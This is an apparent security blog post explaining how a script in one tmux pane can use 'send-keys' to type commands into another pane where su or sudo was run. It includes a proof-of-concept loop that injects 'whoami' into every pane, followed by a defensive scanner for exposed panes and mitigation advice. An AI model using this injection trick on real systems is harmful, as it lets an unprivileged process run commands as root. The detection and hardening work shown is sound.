tmux Privilege Escalation
tmux privilege escalation abusing send-keys
A script run as an unprivileged user inside tmux can, under some circumstances, execute commands as root.
Did you know you can send keystrokes to other panes in tmux?
You can abuse send-keys to send commands to a root/sudo pane.
That's all there is to it, that's the trick.
There's a tmux feature to send keystrokes to a pane.
tmux send-keys -t $pane 'C-c'
for example, sends Ctrl-C (and therefore SIGINT) to whatever is running in pane $pane.
When I saw the send-keys feature, I was like:
"What if there's another pane, where the user is logged in as root?"
tmux
tmux sp
su # login as root
Now go back to the other tmux pane (where you are logged in as user).
Now run the following script to execute whoami in every pane:
#!/bin/sh
# Send Ctrl-C, then "whoami" followed by Enter, to every pane of the current window
for pane in `tmux list-panes | grep -Po '^\d'`; do
    tmux send-keys -t $pane 'C-c'
    tmux send-keys -t $pane 'whoami' Enter
done
You will see, as expected, the command
With the same trick you can abuse the fact that sudo was used in another pane:
tmux send-keys -t $pane 'sudo whoami' Enter
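To check your own tmux server for panes exposed to this, the following added example (not code from the original post) lists every pane whose terminal hosts a process with effective UID 0. The function names, the `--live` switch and the sample data are assumptions made for the example, and the ps format keywords are those of Linux procps.

```shell
#!/bin/sh
# Added example: find tmux panes that any process of the tmux owner could
# type into with send-keys while a root process is attached to the pane's tty.

# exposed_panes PANES PROCS
#   PANES: lines "<pane_id> <pane_tty>"  (tmux list-panes -a -F ...)
#   PROCS: lines "<tty> <euid> <comm>"   (ps -e -o tty=,euid=,comm=)
# Prints "<pane_id> <tty> <comm>" for every root process on a pane's tty.
exposed_panes() {
    printf '%s\n---\n%s\n' "$1" "$2" | awk '
        $0 == "---" { procs = 1; next }          # separator between the two inputs
        !procs && NF >= 2 {                      # pane list: remember tty -> pane id
            sub("^/dev/", "", $2); pane[$2] = $1; next
        }
        procs && ($1 in pane) && $2 == 0 {       # process list: root on a pane tty
            print pane[$1], $1, $3
        }
    '
}

# Constructed sample data: pane %1 has had "su" run in it, pane %0 has not.
SAMPLE_PANES='%0 /dev/pts/3
%1 /dev/pts/4'
SAMPLE_PROCS='pts/3 1000 zsh
pts/4 1000 zsh
pts/4 0 su
pts/4 0 bash
? 0 sshd'

# Same check against the running tmux server and the live process table.
scan_live() {
    exposed_panes "$(tmux list-panes -a -F '#{pane_id} #{pane_tty}')" \
                  "$(ps -e -o tty=,euid=,comm=)"
}

if [ "${1:-}" = "--live" ]; then
    scan_live
else
    exposed_panes "$SAMPLE_PANES" "$SAMPLE_PROCS"
fi
```

A pane where sudo was used earlier will not show up here, because a cached sudo credential is not a running process. Running `sudo -k` after use, or setting `Defaults timestamp_timeout=0` in sudoers, covers that case.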